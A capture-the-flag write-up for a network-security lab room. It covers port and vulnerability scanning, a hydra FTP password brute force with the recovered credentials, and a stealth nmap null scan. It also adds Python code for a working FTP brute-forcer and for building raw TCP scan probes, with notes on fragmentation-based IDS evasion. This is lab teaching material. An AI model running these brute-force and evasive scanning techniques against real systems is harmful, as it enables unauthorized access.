Net Sec Challenge

Challenge Questions

I'll run the following, which delivers nearly all the answers to the questions below.

```shell
tools/enumeration/RustScan/target/release/rustscan -a 10.10.185.143 -u 5000 -- -sC -sV --vv --script vuln
```

What is the highest port number being open less than 10,000?

8080

There is an open port outside the common 1000 ports; it is above 10,000. What is it?

10021

How many TCP ports are open?

All of the open ports the scan found are TCP (the scan above only probes TCP), so the TCP count is simply the number of open ports.

6

What is the flag hidden in the HTTP server header?

```text
80/tcp    open  http        syn-ack lighttpd
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-server-header: lighttpd THM{web_server_25352}
```

What is the flag hidden in the SSH server header?

nmap could not fully match the SSH banner, so it prints the raw service fingerprint, and the flag sits inside it:

```text
SF-Port22-TCP:V=7.92%I=7%D=10/16%Time=616A0C7A%P=x86_64-pc-linux-gnu%r(NUL
SF:L,29,"SSH-2\.0-OpenSSH_8\.2p1\x20THM{946219583339}\r\n");
```

THM{946219583339}

We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

```text
10021/tcp open  ftp         syn-ack vsftpd 3.0.3
```

vsftpd 3.0.3

We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?

Some brute-forcing with hydra, both usernames against rockyou.txt:

```text
[whackx@manbox ~]$ hydra -L users -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ftp://10.10.185.143:10021
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-16 01:35:05
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688796 login tries (l:2/p:14344398), ~1793050 tries per task
[DATA] attacking ftp://10.10.185.143:10021/
[10021][ftp] host: 10.10.185.143   login: eddie   password: jordan
[10021][ftp] host: 10.10.185.143   login: quinn   password: andrea
1 of 1 target successfully completed, 2 valid passwords found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-16 01:35:36
```

Log in as quinn and download the flag with get ftp_flag.txt.

```text
[whackx@manbox ~]$ ftp 10.10.185.143 10021
Connected to 10.10.185.143.
220 (vsFTPd 3.0.3)
Name (10.10.185.143:whackx): quinn
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1002     1002         4096 Sep 20 08:36 .
drwxr-xr-x    2 1002     1002         4096 Sep 20 08:36 ..
-rw-r--r--    1 1002     1002          220 Sep 14 07:43 .bash_logout
-rw-r--r--    1 1002     1002         3771 Sep 14 07:43 .bashrc
-rw-r--r--    1 1002     1002          807 Sep 14 07:43 .profile
-rw-------    1 1002     1002          723 Sep 20 08:27 .viminfo
-rw-rw-r--    1 1002     1002           18 Sep 20 08:27 ftp_flag.txt
226 Directory send OK.
```
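The two steps above (password guessing with hydra, then an interactive ftp session to list the home directory and fetch the file) are what the following Python does with the standard-library ftplib. It is an added example, not code from the original writeup or from hydra, and it shows what hydra hides: a 530 reply means the guess is wrong, while a failed connection means nothing about the password and must be retried, which is the distinction behind hydra's "could not be connected" warning at the end of its run. The FakeFTP class is a constructed stand-in so the code runs offline; it accepts the two credential pairs hydra recovered above, but its listing and file contents are made up (the real flag is not reproduced). The host, port and short wordlist are taken from the writeup; to run it for real, drop the `ftp_factory=FakeFTP` argument so the default `ftplib.FTP` is used.

```python
import ftplib
import io

# Constructed stand-in for the FTP server so the functions below run offline.
# It accepts the credentials hydra recovered in this writeup; the listing and
# file contents are made up (the real flag is not reproduced here).
class FakeFTP:
    CREDS = {"eddie": "jordan", "quinn": "andrea"}
    LISTING = [
        "-rw-r--r--    1 1002     1002          220 Sep 14 07:43 .bash_logout",
        "-rw-rw-r--    1 1002     1002           18 Sep 20 08:27 ftp_flag.txt",
    ]
    FILES = {"ftp_flag.txt": b"THM{constructed_example_flag}\n"}

    def connect(self, host, port=21, timeout=None):
        self.host, self.port = host, port
        return "220 (vsFTPd 3.0.3)"

    def login(self, user, passwd):
        if self.CREDS.get(user) != passwd:
            raise ftplib.error_perm("530 Login incorrect.")  # same reply vsftpd gives
        return "230 Login successful."

    def retrlines(self, cmd, callback):
        for line in self.LISTING:
            callback(line)

    def retrbinary(self, cmd, callback):
        callback(self.FILES[cmd.split(" ", 1)[1]])

    def quit(self):
        return "221 Goodbye."

    def close(self):
        pass


def try_login(host, port, user, password, ftp_factory=ftplib.FTP, timeout=5):
    """True if the server accepts user:password, False on a 5xx reply (530 Login
    incorrect), None if the connection itself failed (retry, do not count as a
    bad password)."""
    ftp = ftp_factory()
    try:
        ftp.connect(host, port, timeout=timeout)
        ftp.login(user, password)
        ftp.quit()
        return True
    except ftplib.error_perm:
        return False
    except OSError:
        return None
    finally:
        ftp.close()  # safe even if connect() never succeeded


def brute_force(host, port, users, passwords, ftp_factory=ftplib.FTP, retries=3):
    """Try every password for every user; first accepted password per user wins.
    Returns {user: password}."""
    found = {}
    for user in users:
        for password in passwords:
            result = None
            for _ in range(retries):
                result = try_login(host, port, user, password, ftp_factory)
                if result is not None:  # got a definitive answer from the server
                    break
            if result:
                found[user] = password
                break
    return found


def fetch_file(host, port, user, password, name="ftp_flag.txt", ftp_factory=ftplib.FTP):
    """Log in, list the home directory (like `ls -la`), download one file into
    memory. Returns (listing_lines, file_text)."""
    ftp = ftp_factory()
    ftp.connect(host, port, timeout=5)
    ftp.login(user, password)
    listing = []
    ftp.retrlines("LIST -la", listing.append)
    buf = io.BytesIO()
    ftp.retrbinary("RETR " + name, buf.write)
    ftp.quit()
    return listing, buf.getvalue().decode().strip()


if __name__ == "__main__":
    users = ["eddie", "quinn"]
    wordlist = ["123456", "password", "jordan", "andrea"]  # constructed; hydra used rockyou
    creds = brute_force("10.10.185.143", 10021, users, wordlist, ftp_factory=FakeFTP)
    print(creds)
    listing, flag = fetch_file("10.10.185.143", 10021, "quinn", creds["quinn"], ftp_factory=FakeFTP)
    print("\n".join(listing))
    print(flag)
```

Against a real vsftpd this is far slower than hydra's 16 parallel tasks, and vsftpd's `max_login_fails` (default 3) will drop the connection every few guesses, which is exactly the None path that the retry loop absorbs.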

Browsing to http://10.10.185.143:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

At first, I tried to be stealthy with something like the following.

```shell
sudo nmap -T1 -sN -ff 10.10.185.143 -vv
```

That did not work. So, I spun up an attack box and iterated through every flag possible. At some point the flag came up on the website.
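The -sN in the command above is a TCP null scan: nmap sends a TCP segment with no flags set at all, rather than the SYN of a normal connection attempt, and infers port state from whether a RST comes back. As an added example (not from the original writeup or the room), the following Python builds the raw 20-byte TCP header for each of nmap's probe types with a correct pseudo-header checksum, and classifies a segment by its flag byte the way a detector would. The addresses and ports are placeholders; actually putting these on the wire needs a raw socket and root, which is nmap's job, so the code only constructs and inspects the bytes.

```python
import socket
import struct

# TCP flag bits (byte 13 of the header)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag combinations nmap uses for its probe types
SCAN_TYPES = {
    SYN: "syn (-sS)",
    ACK: "ack (-sA)",
    0: "null (-sN)",
    FIN: "fin (-sF)",
    FIN | PSH | URG: "xmas (-sX)",
    FIN | ACK: "maimon (-sM)",
}


def ones_complement_sum(data):
    """RFC 1071 checksum over 16-bit words (returns the complemented value)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def pseudo_header(src_ip, dst_ip, tcp_len):
    """IPv4 pseudo-header that the TCP checksum covers in addition to the segment."""
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len))


def tcp_probe(src_ip, dst_ip, sport, dport, flags, seq=0, window=1024):
    """Build a 20-byte TCP header (data offset 5, no options, no payload) with the
    given flags and a valid checksum. flags=0 is what nmap -sN puts on the wire;
    the window value is arbitrary for this example."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, window, 0, 0)
    csum = ones_complement_sum(pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def checksum_ok(src_ip, dst_ip, segment):
    """A segment whose checksum is correct sums (with its pseudo-header) to zero."""
    return ones_complement_sum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def classify_probe(segment):
    """Name the nmap scan type a bare probe corresponds to, from its flag byte.
    A segment with no flags set is never part of legitimate TCP, so a null scan
    stands out immediately to anything that inspects flag bits instead of only
    logging failed connections."""
    flags = segment[13] & 0x3F  # the six classic flag bits; ignore ECN/CWR
    return SCAN_TYPES.get(flags, "other")


if __name__ == "__main__":
    src, dst = "10.0.0.5", "10.10.185.143"  # placeholder attacker / target
    for flags in (SYN, 0, FIN, FIN | PSH | URG):
        seg = tcp_probe(src, dst, 40000, 8080, flags)
        print(f"{classify_probe(seg):12} flags=0x{seg[13]:02x} checksum_ok={checksum_ok(src, dst, seg)} {seg.hex()}")
```

The `-ff` in the command additionally splits the IP packet into 8-byte fragments, so the flag byte at offset 13 lands in the second fragment; a filter that only looks at the first fragment never sees these flags, which is the evasion idea behind that option, and a reassembling sensor sees exactly what `classify_probe` sees.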